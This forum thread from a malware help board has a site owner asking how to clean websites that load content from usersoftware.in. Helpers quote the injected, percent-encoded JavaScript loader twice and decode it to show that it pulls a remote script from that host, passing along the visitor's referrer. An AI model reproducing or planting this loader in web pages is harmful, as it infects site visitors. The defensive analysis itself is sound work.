Malware Related > Compromised Servers
MAlware Found on our Server - Novice here - Need some advice
Toff:
Hello everyone,
A came across your forum just googling it up. Thank god I finally found a place to hopfully find an answer to this.
Around may we received replies from customers stating that we had a virus our on website.
http://www.malwaredomainlist.com/mdl.php?search=usersoftware.in&colsearch=All&quantity=50
If you visit:
www.graduationsource.com or www.avantisystemsusa.com
usersoftware.in loads in the loading screen.
I have no idea what to do. No idea how to fix the problem and no idea even where to begin. Any input would be greatly appreciated.
sowhat-x:
--- Code: ---<script language="javascript">
var xqv='%';document.write(unescape('%3C%73%63%72'+xqv+'69'+xqv+'70'+xqv+'74'+xqv+'20'+xqv+'6C'+xqv+'61'+xqv+'6E'+xqv+'67%75%61%67%65%3D'+xqv+'22'+xqv+'4A'+xqv+'61%76%61%53%63%72%69%70'+xqv+'74'+xqv+'22'+xqv+'3E'+xqv+'0A%76%61%72%20%6C%3D%27%68%74%74%70'+xqv+'3A'+xqv+'2F%2F%75%73%65%72%73%6F%66'+xqv+'74%77%61%72%65%2E%69%6E'+xqv+'2F%78%71%2F%76'+xqv+'73'+xqv+'74'+xqv+'61%76%6B%61%2E%70%68%70%3F'+xqv+'72'+xqv+'3D%27%3B%76%61%72%20'+xqv+'72%3D%65%6E'+xqv+'63%6F%64%65%55%52%49%43%6F%6D%70%6F'+xqv+'6E%65'+xqv+'6E%74'+xqv+'28'+xqv+'64'+xqv+'6F%63%75%6D%65%6E'+xqv+'74'+xqv+'2E'+xqv+'72'+xqv+'65%66%65%72%72%65%72'+xqv+'29'+xqv+'3B'+xqv+'69'+xqv+'66%28%72%29%7B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%73%63%72%69%70%74%20%73%72%63%3D%27%2B%6C%2B%72%2B%27%3E%3C%2F%73%63%72%27%2B%27%69%70%74%3E%27%29%3B%7D%0A%3C%2F%73%63%72%69%70%74%3E' ));
</script>
--- End code ---
A quick look shows that the above is the malicious code,
that has been injected/infecting over there...when decoded,it resolves to:
--- Code: ---<script language="JavaScript">
var l='http://usersoftware.in/xq/vstavka.php?r=';var r=encodeURIComponent(document.referrer);if(r){document.write('<script src='+l+r+'></scr'+'ipt>');}
</script>
--- End code ---
Meaning,as a first step re-action,you should grep through your htmls and clean it...
Orac:
Hi Toff
I assume you have root access to the server.
Comment out this whole sction of script and it will block the link to usersoftware.in
--- Code: ---<script language="javascript">
var xqv='%';document.write(unescape('%3C%73%63%72'+xqv+'69'+xqv+'70'+xqv+'74'+xqv+'20'+xqv+'6C'+xqv+'61'+xqv+'6E'+xqv+'67%75%61%67%65%3D'+xqv+'22'+xqv+'4A'+xqv+'61%76%61%53%63%72%69%70'+xqv+'74'+xqv+'22'+xqv+'3E'+xqv+'0A%76%61%72%20%6C%3D%27%68%74%74%70'+xqv+'3A'+xqv+'2F%2F%75%73%65%72%73%6F%66'+xqv+'74%77%61%72%65%2E%69%6E'+xqv+'2F%78%71%2F%76'+xqv+'73'+xqv+'74'+xqv+'61%76%6B%61%2E%70%68%70%3F'+xqv+'72'+xqv+'3D%27%3B%76%61%72%20'+xqv+'72%3D%65%6E'+xqv+'63%6F%64%65%55%52%49%43%6F%6D%70%6F'+xqv+'6E%65'+xqv+'6E%74'+xqv+'28'+xqv+'64'+xqv+'6F%63%75%6D%65%6E'+xqv+'74'+xqv+'2E'+xqv+'72'+xqv+'65%66%65%72%72%65%72'+xqv+'29'+xqv+'3B'+xqv+'69'+xqv+'66%28%72%29%7B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%73%63%72%69%70%74%20%73%72%63%3D%27%2B%6C%2B%72%2B%27%3E%3C%2F%73%63%72%27%2B%27%69%70%74%3E%27%29%3B%7D%0A%3C%2F%73%63%72%69%70%74%3E' ));
</script>
--- End code ---
It looks as thou they may also be other malware on the sites, which will take further digging to revel.
Please post back as to how you got on.
Toff:
After removing all of the coding it automatically embeds itself again on all of the pages.
sowhat-x:
Toff,say until a few more digging/analysis takes place,
have a view at the links mentioned in this post here,to get an idea of what's been happening...
http://www.malwaredomainlist.com/forums/index.php?topic=1965.msg3919#msg3919
They might also give you a few ideas on where to start searching in your server,
for places where extra malicious scripts/code might reside etc...
Navigation
[0] Message Index
[#] Next page
Go to full version